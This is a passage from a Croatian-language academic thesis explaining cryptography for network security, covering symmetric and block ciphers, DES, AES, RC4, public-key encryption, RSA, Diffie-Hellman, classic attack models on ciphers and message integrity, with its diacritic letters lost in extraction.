Raunalna sigurnost u uem smislu, openito se sastoji od odravanja tri sigurnosna
svojstva46:
-

povjerljivost (tajnost/privatnost) (eng. confidentiality),

cjelovitosti (eng. integrity),

raspoloivost (eng. availability).


Posao i cilj sustava sigurnosti i zatite raunalne mree i mrene komunikacije je da

sprijei nastanak problema koje smo ukratko opisali iznad, u onoj mjeri u kojoj se to moe
uiniti. One vrste napada koje taj sustav ne moe sprijeiti, taj sustav treba otkrivati. Sustav
sigurnosti i zatite treba upozoravati na pojavu onih stanja koja ukazuju na postojanje napada,
tako da komunikatori mogu onemoguiti daljnje odvijanje tih napada, i sprijeiti irenje tetnih
posljedica koje ti napadi pokuavaju izazvati (Radovan, 2011:4).
4.1 Povjerljivost sadraja: kriptografija

Kriptografija je zapisivanje sadraja na nain koji ini da ti sadraji budu razumljivi


(itljivi) samo onima kojima su namijenjeni. Drukije reeno, kriptografski zapis sadraja ima za
46

Hadjina, N., (2009). Zatita i sigurnost informacijskih sustava (nastavni materijali sa zbirkom zadataka).

FER Zavod za primijenjeno raunarstvo,


http://www.smartgrids.hr/_download/repository/SkriptaZaStudente2009-12%5B1%5D.pdf. (preuzeto
26.03.2014.), str. 8.

29

cilj uiniti sadraje nedostupnima (neitljivima) za sve one kojima nisu namijenjeni. Takav nain
zapisivanja sadraja naziva se i ifriranjem sadraja47.
Tajnost informacija se osigurava primjenom opeg modela kriptiranja.
Osnovno naelo zatite tajnosti podataka jest pretvorba podataka. Izvorni, itljivi podaci
iju se tajnost eli zatititi zovu se jasni podaci (eng. plaintext). Tajnost jasnih podataka titi se
postupkom kriptiranja (eng. encription). Postupak kriptiranja je pretvorba jasnih podataka u
neitljive i nerazumljive podatke. Rezultat postupka kriptiranja su kriptirani podaci (eng.
ciphertext). Stvaranjem kriptiranih podataka skriva se informacija zapisana u jasnim podacima.
Dekriptiranje (engl. decription) je postupak obrnut kriptiranju, a njegovom primjenom nad
kriptiranim podacima dobiva se izvorni sadraj jasnih podataka (Popovi, 2006:26).
Dakle, razvojem informacijske tehnologije i komunikacije koju je potrebno zatititi, bitno
se poveala potreba za usavravanjem metoda i sredstava zatite povjerljivosti informacijskih
sadraja, Istodobno, informacijska tehnologija je omoguila razvoj vrlo sloenih metoda
ifriranja sadraja, kao i drugih oblika zatite raunalne mree i sadraja koji se prenose u
mrenoj komunikaciji (prema Radovan, 2011:5).
Slika 9: Struktura ifriranog sustava

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
4.1.1 ifriranje simetrinim kljuem

Glavna osobina simetrinih kriptografskih algoritama je koritenje istog tajnog kljua za


postupke enkripcije i dekripcije48.
47

Radovan, M. (2011). Raunalne mree (2), str. 4.

48

Antoli,K. i dr., op. cit., str. 136.

30

Metode ifriranja kod kojih se slovo Si zamjenjuje uvijek istim slovom Sj nazivaju se
monoalfabetskim metodama ifriranja. Metode kod kojih isto slovo moe biti zamijenjeno
razliitim slovima, nazivaju se polialfabetskim metodama ifriranja. Postoje mnoge mogunosti
polialfabetskog ifriranja sadraja, ali nema potrebe da se ovdje bavimo tim mogunostima
(Radovan, 2011:7). Vano je napomenuti i podjelu simetrinih algoritama: na one koje rade s
blokovima ulaznih podataka (block algorithm) i one koji rade s tokovima bit po bit (eng.
stream algorithm)49. Za uspostavljanje simetrinog kriptografskog sustava koji predstavlja
komunikacijski kanal izmeu dviju strana potrebno dogovoriti tajni klju. Tajni klju se
dogovara prije uspostave komunikacijskog kanala i poznat je samo stranama koje uspostavljaju
komunikaciju. Znatan nedostatak simetrine kriptografije je nerjeen problem tajnosti postupka
kojim se dogovara tajni klju. Taj nedostatak rjeava se upotrebom asimetrine kriptografije
(Popovi, 2006:27).
Postupci asimetrine kriptografije zapravo izvode "zamjeavanje" izvornog sadraja na
razini bitova, a ne na razini slova, no spomenut e se jo jedan algoritam koji radi po naelu
zamjenjivanja slova, prije prijelaska na one sloenije.
Umjesto zamjene slova pomakom po abecedi, ovdje se zamjenu slova (brojki i ostalih
znakova) definira eksplicitno za svako slovo. To se ini pomou skupa parova; pritom se prvi
znak iz para jednoznano preslikava na drugi znak. Takav skup parova naziva se tablicom
preslikavanja i prikazuje se u obliku tablice (Radovan, 2011:8); primjer dijela takve tablice dan
je na slici u nastavku:
Slika 10: Tablica preslikavanja znakova

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Takva tablica moe ifrirati na slova, ali moe ukljuivati i brojke (od 0 do 9), znakove
interpunkcije (toka, zarez), i druge znakove. Takva tablica ima ulogu kljua. ifrirani tekst
proizvodi se vrlo jednostavnim algoritmom, tako da se svaki znak iz izvornog teksta potrai u
gornjem retku tablice, i zatim u ifrirani tekst uvrsti onaj koji se nalazi ispod tog znaka u tablici.
Dakle, algoritam uzima danu tablicu parova kao klju, i prema tom kljuu izvodi zamjenu
znakova, i tako proizvodi ifrirani zapis izvornog sadraja (prema Radovan, 2011:8).
49

ibid. 137.

31

Dobra strana ove metode je u tome to postoji jako mnogo moguih tablica preslikavanja.
Za abecedu od 26 slova postoji 26! ("26 faktorijel") razliitih (moguih) tablica preslikavanja
takve vrste; to je broj reda veliine 10 26. Sa porastom broja znakova (preko 26), bitno raste broj
moguih tablica preslikavanja, to ini ovakav sustav ifriranja jo sigurnijim50.
Meutim, u svakom jeziku postoje tipine rijei od dva ili tri slova; u engleskom su to
rijei "in", "on", "it", "the", i sl. Ukoliko napada zna o kojoj temi govori neka ifrirana poruka,
to mu u znatnoj mjeri olakava otkrivanje parova iz tablice preslikavanja, odnosno otkrivanje
izvornog sadraja te poruke. Na temelju duljine zapisa rijei i frekvencije njena javljanja u
ifriranom zapisu, napada moe otkriti koja je to rije u izvornom zapisu; time je ujedno otkrio
znatan broj parova iz tablice preslikavanja (prema Radovan, 2011:8).
Zbog svega navedenog, moe se zakljuiti da ova metoda ifriranja (algoritam i klju)
zbog relativno niske sigurnosti koju prua nije pogodna za praktinu primjenu. Ta metoda ima
jo nedostataka kao to je relativno velik klju.
4.1.2 ifriranje po blokovima (Block Algorithm)

ifriranje po blokovima puno je sigurnija metoda bazirana na ifriranju simetrinim


kljuem na razini niza bitova.
Sadraji koji se prenose raunalnom mreom zapisani su pomou nizova bitova. IP paket
podataka je jedan takav niz. Jedan dio takvog niza (jedan podniz) naziva se blokom. ifriranje
podataka izvodi se po blokovima; blokovi mogu biti razliite veliine; ovdje uzimamo da je blok
niz od 64 bita (Radovan, 2011:9).
ifriranje je openito proces koji u vidu funkcije preslikava jedan ulazni niz bitova
(blok) na jedan izlazni niz bitova (blok) jednake duine (prema Radovan, 2011:9). Preslikavanje
ovdje praktiki znai zamjenjivanje jednog niza bitova (bloka) sa drugim nizom bitova
(blokom); u procesu ifriranja, blok kao jedan podniz od niza bitova sa kojim je zapisan izvorni
sadraj, zamjenjuje se sa drugim blokom, koji je ifrirani zapis polaznog sadraja (Radovan,
2011:9).
ifriranje se izvodi za svaki takav blok zasebno a ifrirani zapis bloka je iste duine kao i
izvorni blok. ifrirani blokovi slau se jedan za drugim i na taj nain tvore ifrirani zapis
izvornog sadraja. Sredinje pitanje kod ifriranja je kako definirati preslikavanje ulaznih
blokova u izlazne (ifrirane) blokove (prema Radovan, 2011:9).
50

Radovan, M., op. cit., str. 8.

32

Moderni alati za ifriranje diska podatke ifriraju u pravom vremenu (eng. on-the-flyencription, real-time encription), tj. podatke ifriraju dok ih spremaju (kopiraju) u ifrirani
spremnik, ili u sluaju itanja, deifriraju dio datoteke koji se ita. Uobiajeni nain ifriranja je
blokovski, tj. podaci se u radnoj memoriji ifriraju u blokovima te se tek onda spremaju na disk
ili itaju51.
Niz duine 64 bita moe poprimiti 264 razliitih vrijednosti (kombinacija bitova), to daje
vei broj parova oblika < Bulaz, Bizlaz > nego to se moe praktiki proizvesti (eksplicitno
definirati) i zapisati u raunalo. Tolike parove blokova ne bi imalo ni smisla raditi, jer bi tako
ogromna koliina parova bila neprikladna za upotrebu (pretraivanje) u procesu ifriranja
(Radovan, 2011:10).
Iz navedenih razloga, umjesto da se eksplicitno definira preslikavanje 64-bitnih blokova u
komadu, algoritam ifriranja definiran je kao proces paralelnog preslikavanje 8 dijelova od
jednog bloka, pri emu je svaki dio dug 8 bitova. Niz od 8 bitova moe poprimiti 2 8 razliitih
kombinacija bitovnih vrijednosti "0" ili "1"; dakle, 256 razliitih vrijednosti niza. To znai da za
definiranje preslikavanja za sve mogue vrijednosti niza od 8 bitova treba 256 parova oblika
< ulazni-8-bitni-niz, izlazni-8-bitni-niz >52
Za svaki od 8 nizova (dijelova jednog bloka) treba definirati jednu takvu tablicu
preslikavanja, to je relativno jednostavno napraviti. Na slici u nastavku dan je grafiki prikaz
strukture algoritma za ifriranje 64-bitnih blokova, kakvog ovdje opisujemo:

Slika 11: Algoritam ifriranja po blokovima

51

CIS FER, (2011). Kriptiranje podataka. http://www.cis.hr/sigurosni-alati/kriptiranje-podataka.html.


(preuzeto 07.04.2014.).
52

Radovan, M., op. cit., str. 10.

33

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Nakon prolaska kroz proces takvog preslikavanja, osam nizova od po 8 bitova, koji su
proizvedeni u tom procesu, tvore jedan 64-bitni niz u kojem su bitovi ifrirani (permutirani,
preslikani) unutar svake osmorke bitova; pritom su osmorke ostale u istom redoslijedu u kojem
su bile na poetku. Slijedi proces permutacije bitova na razini 64-bitnog bloka; dakle, ovdje
se permutiraju bitovi na razini cijelog bloka. Rezultat te permutacije je ujedno rezultat tekueg
prolaza kroz cikliki proces (algoritam) ifriranja jednog bloka (Radovan, 2011:11).
Taj rezultat alje se na ulaz algoritma, ime se opisani proces ifriranja ("zamjeavanja
bitova") izvodi ponovno. Takav cikliki proces ifriranja jednog bloka moe imati vie desetaka
iteracija. Po zavretku iteriranja, rezultat zadnjeg prolaza kroz opisani proces ifriranja je
ifrirani zapis izvornog zapisa 64-bitnog bloka kojeg se ifriralo (Radovan, 2011:11).
Kod svakog ifriranja, nain na koji algoritam zamjeava bitove odreen je vrijednou
kljua sa kojim se izvodi to ifriranje. Algoritam je precizno definiran i obino je javno poznat,
ali algoritam izvodi svaki proces ifriranja na nain koji je odreen nizom bitova zadane duine,
koji se naziva kljuem, i kojeg se zadaje algoritmu prigodom ifriranja (Radovan, 2011:11).
Za isti polazni zapis sadraja, isti algoritam za ifriranje proizvodi razliite ifrirane
zapise za razliite vrijednosti kljua (Radovan, 2011:11).
U opisanom algoritmu, ulogu kljua mogu imati osam tablica preslikavanja, ili funkcija
permutiranja bitova u 64-bitnom bloku kojeg proizvodi osam preslikavanja 8-bitnih nizova, ili
oboje. Ono to u procesu ifriranja nije fiksno zadano, i to se moe zadati kod pokretanja
procesa ifriranja (pomou nekog ulaznog parametra), to moe imati ulogu kljua algoritma za
ifriranje (Radovan, 2011:11).

34

Za napomenuti je da se navedeno ne odnosi na neki specifini algoritam, ve openito na


algoritme kojima se izvodi ifriranje simetrinim kljuem.
Vie sustava za ifriranje koji se nalaze u irokoj primjeni, rade prema gore navedenim
naelima. Meu najpoznatije sustave takve vrste spadaju DES (Data Encryption Standard),
3DES (triple-DES), i AES (Advanced Encryption Standard). Ti sustavi izvode preslikavanja na
razini 8-bitnih nizova bitova, kao u sustavu kojeg smo opisali iznad, ali ne omou eksplicitno
zadanih tablica parova, nego sa funkcijama. Razlika izmeu tablica i funkcija je ipak vie
operativna nego sutinska. Svaka funkcija je implicitna definicija jedne tablice parova oblika
(ulaz, izlaz); svaka tablica parova oblika (ulaz, izlaz) je eksplicitan zapis uinaka jedne funkcije
(prema Radovan, 2011:12).
Navedeni algoritmi za ifriranje i deifriranje koriste jedan niz bitova kao klju. Sustav
DES izvodi ifriranje po 64-bitnim blokovima, a koristi 56-bitne kljueve. Sustav AES izvodi
ifriranje po 128-bitnim blokovima, a moe koristiti kljueve od 128, od 192 i od 256 bitova.
Sadraj kljua (kao niz bitova) odreuje neke unutarnje postavke (naine skretanja, tokove
procesa) u algoritmu; te postavke utjeu na to na koji nain taj algoritam ifrira neki zadani
sadraj (prema Radovan, 2011:12).
Zakljuno, vrijednost kljua odreuje izgled ifriranog zapisa sadraja kojeg neki
algoritam proizvodi u odnosu na izvorni zapis toga sadraja. Kod blokovskog algoritma
vrijednost kljua moe odreivati ponaanje osam funkcija preslikavanja i funkcije koja
permutira bitove na razini bloka koji nastaje kao rezultat jednog prolaska kroz osam paralelnih
preslikavanja. Klju moe utjecati i na broj iteracija, ali to izgleda manje bitnim nego to su to
preslikavanja i permutacije (prema Radovan, 2011:12).
Kod gore opisanog sustava za ifriranje sa simetrinim kljuem, strane koje razmjenjuju
sadraje trebaju imati zajedniki tajni klju tj. onaj koji je poznat samo njima. Takav nain
ifriranja u uporabi je gotovo od samih poetaka informatike, ali 1970-ih godina razvijen je
algoritam drugaije vrste, kod kojeg se ifriranje izvodi uporabom javnog

kljua, a

deifriranje uporabom privatnog (tajnog) kljua.


Kod sustava koji rade sa tajnim (simetrinim) kljuem, lana predstavljanja kod ifriranih
poruka nisu mogua. Naime, u takvom sustavu subjekt A koristi tajni klju K AB samo u
komunikaciji sa subjektom B, i subjekt B koristi taj tajni klju samo u komunikaciji sa
subjektom A; pritom je klju KAB poznat samo subjektima A i B. Zato kod tog sustava ifriranja,
kad A primi ifriranu poruku koja tvrdi da dolazi od subjekta B, onda A pokua deifrirati tu
poruku sa kljuem KAB kojeg dijeli samo sa B. Ako taj pokuaj deifriranja uspije, onda A moe

35

biti siguran da ta poruka dolazi od B, jer nitko drugi ne poznaje klju K AB sa kojim je ta poruka
ifrirana (Radovan, 2011:15).
Ovo izuzetno svojstvo takvog sustava ifriranja sa simetrinim kljuem kojeg u
meusobnoj komunikaciji koriste samo dva komunikatora vrijedi uz uvjet da se tog kljua ne
domognu tree osobe.
Najpoznatiji simetrini kriptografski algoritam toka je RC4, autora Rona Rivesta, koji je
svoju tajnovitost zadrao do 1994. godine te do tada bio slubeno prihvaen od amerike vlade.
RC4 i danas se jo ponegdje koristi uglavnom u obliku 256 bitnih kljueva. Njegovom
neispravnom uporabom, lako dolazi do kompromitacije enkriptiranih podataka, kao to je to bio
sluaj sa WEP protokolom WIFI mrea (prema Antoli, 2010:145).
RC4 (drugim imenom ARC4 ili ARCFOUR) je irokokoriteni program koji se koristi u
raznim protokolima poput SSL (osiguravanje prometa) i WEP (osiguravanje beinih mrea).
Dizajnirao ga je Ron Rivest u RSA Security odjelu 1987. godine. (RC je akronim za "Ron's
Code"). Algoritam generira pseudo-sluajni niz bita koji se kombinira sa tekstom koritenjem
XOR funkcije (dekriptiranje se obavlja na isti nain). Za generiranje niza koriste se: permutacije
256 bitova i dva pokazivaa duljine 8 bita53.
Uglavnom, simetrini algoritmi su po svojoj prirodi bri, tj. implementacija na raunalu
se bre odvija od implementacije asimetrinih algoritama. No, zbog nekih prednosti asimetrinih
algoritama. u praksi se obje vrste algoritama isprepleu u cilju bolje zatite poruka. Obino se
asimetrini algoritmi koriste za enkripciju sluajno generiranog broja koji slui kao klju za
enkripciju originalne poruke metodama simetrinih algoritama. Ovo se naziva hibridna
enkripcija54.
4.1.3 ifriranje asimetrinim kljuem uloga javnog kljua

Asimetrini kriptografski sustavi za kriptiranje i dekriptiranje primjenjuju dva razliita


kljua, koji zajedno ine jedinstveni par kljueva. Par kljueva zove se javno-tajni par i sastoji se
od javnog kljua (eng. public key) i tajnog kljua (eng. private key, secret key). Javni klju je
53

CARNet CERT u suradnji s LS&S, (2009). TLS protokol. CCERT-PUBDOC-2009-03-257. Revizija 1.04.
http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2009-03-257.pdf. (preuzeto
07.04.2014.)., str. 6.
54

Semeni, V. Simetrini algoritmi za kriptiranje. http://os2.zemris.fer.hr/index.php?kat=1&podkat=12.


(preuzeto 05.04.2014.).

36

javno dostupan svima, dok je tajni klju poznat samo njegovu vlasniku. Javni klju se
primjenjuje za kriptiranje podataka, a podaci kriptirani javnim kljuem mogu se dekriptirati
samo uporabom tajnog kljua. Mogu je i obrnuti smjer kriptiranja, gdje se kriptira tajnim
kljuem, a dekriptira javnim kljuem (Popovi, 2006:27).
Zahtjev da dvije strane u komunikaciji trebaju imati zajedniki tajni klju ne mora biti
problem, ali moe biti velik problem iz raznih razloga. Prije svega, dvije strane trebaju
dogovoriti zajedniki tajni klju. Kod globalne mrene komunikacije to openito nije lako uiniti
na siguran nain, jer komunikatori mogu biti meusobno vrlo udaljeni i ne susretati se fiziki. S
druge strane, dogovarati tajni klju pomou obinih poruka raunalne pote je riskantno;
komunikatori ne mogu ifrirati svoje poruke raunalne pote prije nego to dogovore tajni klju
(Radovan, 2011:13).
Budui da klju poznaju dvije osobe, poveava se mogunost da netko trei sazna taj
klju a ukoliko i doe do toga, moe nastati spor oko odgovornosti i utvrivanja strane koja je
dopustila da klju sazna trea osoba ime je izravno ugroena povjerljivost (tajnost)
komunikacije. Iz tog razloga potrebno je tajni klju povremeno preventivno mijenjati, uz obvezni
uvjet da se novi tajni klju ne dogovara porukama koje su ifrirane starim kljuem, jer ukoliko je
isti kompromitiran, moe se takvim komunikacijskim kanalom saznati i novi klju.
Budui je glavni problem u simetrinom ifriranju upravo rukovoenje tajnim
kljuevima, nakon objavljivanja rada koji su napisali Whitfield Diffie i Martin Hellman 1976.
godine pojavilo se ifriranje s javnim kljuevima. Metoda je toliko promijenila rad s kljuevima
da ju David Kahn opisuje kao "najvei, revolucionarni napredak u kriptografiji od renesanse" 55.
ifriranje poruka za primatelja A izvodi se uz upotrebu javnog kljua od A; taj klju
oznaavamo sa KA+. Primatelj A deifrira tako ifrirane poruke uz upotrebu svog privatnog
kljua KA- (Radovan, 2011:14).
U ovakvoj komunikaciji nema potrebe za razmjenom zajednikog tajnog kljua, jer on
ovdje ovdje i ne postoji. Klju svakog subjekta komunikacije je javan (na Internetu) i dostupan
svima, tako da nema potrebe slati bilo kome. Privatni klju svakog subjekta je tajan i koristi ga
samo taj subjekt, tako da nema potrebe da se taj klju alje bilo kome (prema Radovan, 2011:14).
Takav, na prvi pogled idealan sustav ifriranja, ima i jednu kljunu slabost - troi
mnogostruko vie vremena za ifriranje, nego sustav sa simetrinim kljuem. Takoer, primatelj
ifrirane poruke ne moe biti siguran da li ona zaista potjee od subjekta koji je u poruci naveden

55

http://hr.wikipedia.org/wiki/Kriptografija#Javni_klju.C4.8Devi. (preuzeto 14.03.2014.).

37

kao poiljatelj. Takav problem identiteta u ovom sustavu i inae, rijeen je razvojem ve
spomenutog sustava digitalnog potpisa.
Godine 1976. Diffie i Hellman 56 razvili su jedan algoritam koji omoguava da se
ifriranje izvede pomou jednog kljua, a deifriranje pomou drugog kljua. To je bio poetak
razvoja sustava za ifriranje uz upotrebu javnih kljueva primatelja, njegova sredinja uloga
prisutna je i u sustavu utvrivanja identiteta komunikatora, te digitalnog potpis. Na slici u
nastavku prikazana je osnovna struktura sustava za ifriranje uz upotrebu javnog i tajnog
(privatnog) kljua primatelja.

Slika 12: ifriranje kod javnog i privatnog kljua

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Ukoliko subjekt A eli poslati subjektu B poruku m u ifriranom obliku, u sustavu
ifriranja sa javnim kljuem, subjekt B imat e svoj javni klju K B+ (za ifriranje) i svoj privatni
klju KB- (za deifriranje). Poiljatelj A pokree sustav za ifriranje sa javnim kljuem i zadaje
mu javni klju KB+ od primatelja B i sadraj svoje poruke m. Proces ifriranja sadraja m sa
javnim kljuem KB+ proizvodi ifrirani zapis KB+(m) sadraja m. Poiljatelj alje taj ifrirani zapis
primatelju B (prema Radovan, 2011:14).
Po primitku ifriranog zapisa koji je ifriran njegovim javnim kljuem, primatelj B
pokree sustav za ifriranje i deifriranje (sa javnim i tajnim kljuem) i tom sustavu zadaje
primljeni ifrirani zapis KB+(m) i svoj privatni klju KB-. Na temelju toga sustav izraunava K B(KB+(m)). Dakle, uz upotrebu svog privatnog kljua KB-, primatelj B iz ifriranog zapisa KB+(m)
56

http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange. (preuzeto 14.03.2014.).

38

koji je ifriran sa njegovim javnim kljuem KB+, izraunava izvorni zapis sadraja m. Jer vrijedi
slijedei odnos:
KB-(KB+(m)) = m57
Da bi ovakav sustav ifriranja i deifriranja ispravno funkcionirao, javni i privatni klju
trebaju biti meusobno zavisni u smislu svojstva kojim se postie da ono to se ifrira sa jednim
od ta dva kljua, moe biti deifrirano s drugim kljuem.
Sustav ifriranja sa javnim i privatnim kljuem ima jo neka vrlo korisna svojstva o
kojima govorimo u nastavku. Glavno od tih svojstava je slijedee: kao to se sa privatnim
kljuem deifrira ono to je ifrirano sa pripadnim javnim kljuem, tako se sa javnim kljuem
moe deifrirati ono to je ifrirano sa pripadnim privatnim kljuem. To znai da vrijedi
jednakost:
KB-(KB+(m)) = KB+(KB-(m)) = m58
To svojstvo ini osnovu sustava digitalnog potpisa.
Da bi sustav ifriranja sa javnim i tajnim kljuem bio dovoljno dobar za iroku uporabu,
mora ispuniti nekoliko osnovnih uvjeta, meu koje spadaju (prema Radovan, 2011:15):
- Nain formiranja parova kljueva (javni, tajni) treba biti takav da napada ne moe
utvrditi tajni klju KA- primatelja A na temelju uvida u njegov javni klju KA+.
- Nain ifriranja sadraja treba biti takav da napada nema praktiki nikakvih izgleda da
na temelju uvida u ifrirani zapis koji je napravljen prema javnom kljuu K A+, otkrije pripadni
privatni klju KA-.
- Nain ifriranja sa javnim kljuem treba biti takav da napada nema praktiki nikakvih
izgleda da deifrira ifrirani zapis koji je napravljen prema nekom javnom kljuu - osim sa
pripadnim privatnim kljuem (koji mu nije dostupan).
4.1.4 RSA sustav ifriranja

Algoritam (sustav) RSA je najpoznatiji i najkoriteniji sustav za ifriranje uz upotrebu


javnog kljua; ujedno je i prvi asimetrini algoritam koji je omoguio i potpisivanje, i enkripciju
podataka59. Naziv tog sustava ine prva slova prezimena trojice autora koji su 1977. godine
razvili taj sustav: Rivest, Shamir, Adleman (prema Radovan, 2011:15).
57

Radovan, M., op. cit., str. 15.

58

loc. cit.

59

Antoli,K. i dr., op. cit., str. 146.

39

Obuhvaa tri koraka: generiranje kljua, kriptiranje i dekriptiranje. Sigurnost algoritma se


temelji na dva matematika problema: faktorizacija velikih brojeva i RSA problem, tj. zadatak
pronalaenja n-tog korijena modula kompozitnog broja N, iji faktori nisu poznati60.
Raunanje je prvo potrebno da se odredi odgovarajui par javnog i tajnog kljua za novog
korisnika usluga ifriranja sustava RSA. Raunanje sa vrlo velikim brojevima izvodi se i u
procesu ifriranja sadraja, to ifriranje u ovom sustavu ini neusporedivo sporijim nego u
sustavima koji koriste simetrine kljueve. Sustav sa simetrinim kljuem DES izvodi ifriranje
barem 100 puta bre nego sustav RSA, kad je DES implementiran softverski, a izmeu 1000 i 10
000 puta bre kad je implementiran hardverski. Zato se sustav RSA obino koristi zajedno sa
nekim sustavom za ifriranje koji koristi simetrine kljueve, kakav je sustav DES (Radovan,
2011:16).
U takvoj kombinaciji, sustav RSA koristi se za dogovaranje simetrinog (tajnog) kljua
KAB izmeu subjekata A i B, za ifriranje u sustavu DES. Subjekt A odabire jedan simetrini
klju KAB za ifriranje u sustavu DES onih poruka koje razmjenjuje sa B. Subjekt A ifrira klju
KAB pomou sustava RSA uz primjenu javnog kljua KB+ subjekta B, i alje tako ifrirani klju
KAB subjektu B. Subjekt B deifrira ifrirani zapis simetrinog kljua K AB uz pomo svog
privatnog kljua KB- u sustavu RSA (Radovan, 2011.).
Time su A i B razmijenili (utvrdili) jedan simetrini tajni klju K AB pomou sustava RSA,
a za potrebe ifriranja sadraja njihove meusobne komunikacije pomou mnogo breg sustava
DES. A i B sad ifriraju svoje sadraje sa K AB u sustavu DES, koji je mnogo bri (Radovan,
2011.).
Kljuevi ovdje takoer mogu biti otkriveni od strane treih osoba. Komunikatori koji
dijele DES simetrini klju mogu grekom uiniti da taj klju postane poznat mnogima, iz gojeg
razloga se isti preventivno periodiki mijenja.
Kljuevi su kratki sadraji, tako da proces odabira i razmjene novog simetrinog kljua
pomou sustava RSA ne iziskuje puno rada. Komunikatori A i B mogu na poetku svake
komunikacije odrediti novi simetrini klju KAB kojeg e koristiti samo u toj komunikacije (ili toj
komunikacijskoj sesiji). Zato se takav klju KAB naziva kljuem sesije (session key)61.
Pored algoritma sa javnim kljuem RSA, koristi se i algoritam Diffie-Hellman, koji je iste
vrste. Algoritam Diffie-Hellman ne moe kodirati sadraje proizvoljne duine, ali moe se
60

CARNet CERT u suradnji s LS&S, (2009). TLS protokol. CCERT-PUBDOC-2009-03-257. Revizija 1.04.
http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2009-03-257.pdf. (preuzeto
07.04.2014.)., str. 6.
61

Radovan, M., op. cit., str. 16.

40

koristiti za kodiranje kljueva sesije, koji se onda koriste za kodiranje u sustavima sa simetrinim
kljuem, kao to su DES i AES (Radovan, 2011:16).

4.1.5 Otkrivanje izvornog sadraja iz ifriranog zapisa

Otkrivanje izvornog sadraja iz ifriranog zapisa toga sadraja (bez posjedovanja kljua)
naziva se probijanjem ili razbijanjem kode (breaking the code). Kodom ili kodnim zapisom se
ovdje naziva ifrirani zapis izvornog sadraja. Pokuaj probijanja kode od strane nekog napadaa
moe se izvoditi u razliitim okolnostima. Pogledajmo tri osnovne (i tipine) situacije62:
(1) Napada posjeduje samo ifrirani zapis sadraja - Napada se domogao ifriranog
zapisa sadraja, ali ne zna koje je vrste taj sadraj ni o emu govori. Takva situacija naziva se
napadom samo sa ifriranim sadrajem (eng. ciphertext-only attack). Ta situacije je prilino
nepovoljna za napadaa jer ne posjeduje dodatna znanja ne temelju kojih moe pokuati probiti
ifrirani zapis sadraja.
(2) Napada posjeduje izvorne zapise nekih sadraja i ifrirane zapise istih sadraja,
koji su ifrirani prema nekom algoritmu i kljuu. Takav napad naziva se napadom sa poznatim
izvornim (itljivim) sadrajem (eng. known-plaintext attack). U ovom sluaju radi se o napadu
na algoritam i klju ifriranja. Napada koji posjeduje izvorni zapis sadraja i ifrirani zapis toga
sadraja pokuava na temelju toga otkriti algoritam i klju ifriranja. Ako u tome uspije, onda e
u budue lako deifrirati (i itati) sve druge poruke koje su ifrirane sa tim algoritmom i kljuem,
ije ifrirane zapise uspije kopirati u prijenosu. Dobar sustav ifriranja (algoritam i klju) trebao
bi izdrati takvu vrstu napada; dakle, napada ne bi smio uspjeti otkriti algoritam i klju u
situaciji kakvu smo ovdje opisali.
(3) Napada moe biti u poziciji dobiti ifrirani zapis tono onog sadraja kojeg je on
sam odabrao. To znai da napada ima mogunost navesti poiljatelja da ifrira i poalje tono
onaj sadraj kojeg eli napada; napada pak bira onaj sadraj za kojeg smatra da e mu najbolje
pomoi da otkrije algoritam i klju sa kojim poiljatelj ifrira svoje sadraje. Napada mora
62

ibid., 9.

41

ovdje biti u poziciji da moe kopirati (u prijenosu) ifrirane sadraje onih poruka za koje je on
sam naveo poiljatelja da ih ifrira i poalje na neko odredite. Tada napada posjeduje izvorni
zapis i ifrirani zapis onih sadraja koje je on sam odabrao. Tu vrstu napada naziva se napadom
sa odabranim izvornim (itljivim) sadrajem (eng. chosen-plaintext attack). Na temelju
odabranih izvornih sadraja i njihovih ifriranih zapisa, napada pokuava utvrditi algoritam i
klju sa kojima poiljatelj ifrira svoje sadraje. Ovo je povoljna situacija za napadaa, ali i u
takvoj situaciji vrlo je teko otkriti sustav (algoritam i klju) ifriranja, ako je taj sustav dobro
napravljen.
Pokuaj probijanja (otkrivanja) sadraja ifriranog zapisa metodom grube sile (eng.
brute force) izvodi se na taj nain da se dani ifrirani zapis sistematski pokuava deifrirati svim
moguim vrijednostima kljueva63. Dakle, algoritmu za deifriranje zadaju se (nekim redom) sve
permutacije niza od onoliko bitova koliko je dugaak klju kod tog algoritma za ifriranje.
Vjerojatnost da takav pokuaj deifriranja uspije je vrlo mala, pogotovo kod onih sustava kod
kojih je duina kljua relativno velika. Broj razliitih nizova bitova duine n iznosi 2n, tako da
kod duine kljua od 56 bitova, broj moguih kljueva iznosi 2 56. To je vrlo velik broj kljueva,
tako da raunalo ne stigne pokuati izvesti (u nekom realnom vremenu) proces deifriranja sa
svakim od tih kljueva, "traei pravog" koji e proizvesti itljiv sadraj (Radovan, 2011:12).
Brzina deifriranja zapisa bez poznavanja kljua moe se poveati paralelnim
procesuiranjem tj. primjenom veeg broja procesora to je neophodno u sluaju duljeg kljua
budui da brzina deifriranja u takvom sluaju eksponencijalno opada.
Naprimjer, ukoliko pretpostavimo da neko raunalo moe deifrirati grubom silom neki
sadraj koji je ifriran sa 56-bitnim kljuem (kao kod sustava DES), u vremenu od jedne
sekunde, trebalo bi 150 trilijuna godina da na isti nain deifrira identian sadraj kad je ifriran
uz upotrebu kljua od 128 bitova, kakvog se koristi u sustavu AES (prema Radovan, 2011:12).
4.2 Integritet poruke i autentinost komunikatora

Pojam integriteta poruke odnosi se na ouvanje izvornosti sadraja poruke u procesu


prijenosa od poiljatelja do primatelja.
Potpis same poruke mora biti jednak prije slanja i poslije primanja iste kako bi primatelj
bio siguran da poruka putem nije izmjenjena64.
63

http://en.wikipedia.org/wiki/Brute-force_attack. 03.02.2014., (preuzeto 14.03.2014.).

64

CIS FER. (2011). Kriptiranje elektronike pote. http://www.cis.hr/sigurosni-alati/kriptiranjeelektronicke-poste.html. (preuzeto 07.04.2014.).

42

Opi mehanizmi za provoenje i ouvanje integriteta su:


-

dobro formirane transakcije: podacima se moe manipulirati od strane specifinog


skupa programa, korisnika koji imaju pristup programima radije nego samim podacima,

razdvajanje dunosti : korisnici trebaju suraivati kako bi manipulirali s podacima,


te se moraju tajno dogovarati kako bi penetrirali u sustav65.
